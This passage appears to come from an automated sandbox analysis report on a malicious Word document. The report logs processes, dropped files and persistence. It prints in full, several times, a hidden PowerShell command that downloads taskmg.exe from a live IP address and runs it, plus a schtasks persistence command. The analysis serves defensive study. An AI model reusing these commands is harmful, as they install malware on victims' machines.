                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_002B12BB push esp; retn 001Ch
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_002B3654 push esp; retn 001Ch
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4FDE5 push ebp; ret
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4FD95 push ebp; ret
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4FD46 push ebp; ret
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.79660930856
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.79660930856
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.79660930856

                    Persistence and Installation Behavior:

                    barindex
                    Tries to download and execute files (via powershell)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile created: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\taskmg.exeJump to dropped file

                    Boot Survival:

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
